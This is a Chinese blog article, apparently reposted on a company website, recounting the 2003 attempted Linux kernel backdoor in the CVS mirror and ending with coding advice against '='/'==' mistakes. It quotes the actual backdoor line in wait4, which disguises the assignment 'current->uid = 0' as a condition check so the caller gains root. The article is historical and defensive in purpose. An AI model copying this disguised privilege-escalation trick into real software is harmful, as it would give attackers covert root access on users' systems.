Linux內核是開源的代碼，能不能向其中安插一個后門呢？這是一件難度很高的操作，但是有人卻差點兒成功了，我們來看看這是怎么回事。

時間回到2003年，當時Linux內核的代碼主倉庫保存在一個叫做BitKeeper的商業軟件中。如果想對Linux內核代碼進行修改的話，需要走一個審批流程，以此來確定這次更改能否被接受。每一次更改都有一個簡單的說明，其中包含一個指向審批記錄的鏈接。

但是有些人不喜歡BitKeeper（堂堂的Linux怎么能保存在閉源的商業軟件中？！）， 于是一個CVS（估計好多人都沒聽說過它了吧）被建立了起來，其中保存著從BitKeeper clone來的代碼， 這樣開發人員可以用開源的CVS來訪問Linux代碼。

2003年11月5號，Larry McVoy 注意到了一件怪事，CVS中的一個代碼變更沒有包含審批記錄的鏈接， 這是怎么回事？

經過一番調查發現：從來沒有人批準過這個代碼變更，奇怪的是，這個代碼變更并沒有出現在BitKeeper主倉庫中，原來是有人黑進了CVS的服務器，偷偷插入了一段代碼。這段代碼到底做了什么事情呢？

這段代碼修改了一個叫做wait4的Linux函數，程序可以使用wait4來等待一些事情的發生，這個代碼變更增加了這么兩行：

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;

（代碼可左右滑動，懂得C語言的同學可以思考下，這段代碼有什么不尋常的？）

粗一看這段代碼，就會覺得這沒啥啊？不就是做一點條件檢查嗎，不滿足條件就返回錯誤。

但是仔細看看就會發現事情不對，第一行的最后， 有個"current->uid=0"， 而不是 "current->uid == 0" 。

正常的寫法應該是“==0”, 就是檢查當前的用戶ID是不是0， 寫成“=0”就是把當前用戶ID設置為0 ， 而ID為0的用戶是"root" ！

這就意味著，如果這段代碼被執行，當前用戶就會變成root，可以在系統中為所欲為！

這其實是個經典的后門， 想象一個，一個黑客在Linux運行了一個程序，這個程序調用了wait4, 然后這個黑客突然間具備了root權限！

這個后門可是真夠聰明的，偽裝成了條件檢查，試圖蒙混過關，如果一直沒人發現會怎么樣呢？

首先，后門存在CVS中，不在BitKeeper的主倉庫中，從BitKeeper 代碼庫Build出的Linux肯定沒問題， 但是如果有人從CVS代碼庫中build了Linux， 那就中招了。

其次，搞破壞的家伙可能有這樣的預期：有個被Linus Torvalds所信任的內核開發者，他討厭BitKeeper，并且在使用CVS， 那當他修改了代碼，準備通過郵件的方式向Linus Torvalds發送patch的時候發現，咦，wait4這里也有個code change， 是做條件檢查的，也包括進去吧。Linus收到補丁，一看是自己信任的兄弟提交的，沒有仔細檢查，于是后門代碼進入了主代碼倉庫。

這當然是猜測的場景，也算是一種社會工程學攻擊吧，不過Linux團隊非常小心，把這個后門給揪了出來。

故事到這里就可以結束了，再就這個話題擴展一下，多說兩句。

我記得剛工作的時候，有個同事給我說，在C語言中，當需要和0比較的時候，可以把0放到前面，這么寫：

if( 0 == user_id){ ....... }

這樣即使把 == 寫成了 = ， 編譯器就會發現錯誤。我當時覺得挺古怪的，把一個數字放到前面，變量放到后面。后來習慣了，在Java 也經常會這樣寫 if (null == user){ ...... }

其實現在的IDE都很智能了，像這種把==寫成=的情況，IDE就可以給出警告。即使沒有用IDE，如果對源碼做靜態的代碼分析，也會被抓出來的警告的。

Linux是開源的代碼，任何人，只要你愿意，都可以查看所有的代碼，這相當于把Linux放到了陽光底下，無數雙眼睛都盯著看，這種透明度使得在其中安插一個后門是非常難的。

分享文章：如何在Linux中安插一個后門？
本文地址：http://www.js-pz168.com/news46/102846.html

成都網站建設公司_創新互聯，為您提供微信小程序、響應式網站、網站設計公司、域名注冊、微信公眾號、定制網站

廣告

聲明：本網站發布的內容（圖片、視頻和文字）以用戶投稿、用戶轉載內容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網站立場，如需處理請聯系客服。電話：028-86922220；郵箱：631063699@qq.com。內容未經允許不得轉載，或轉載時需注明來源： 創新互聯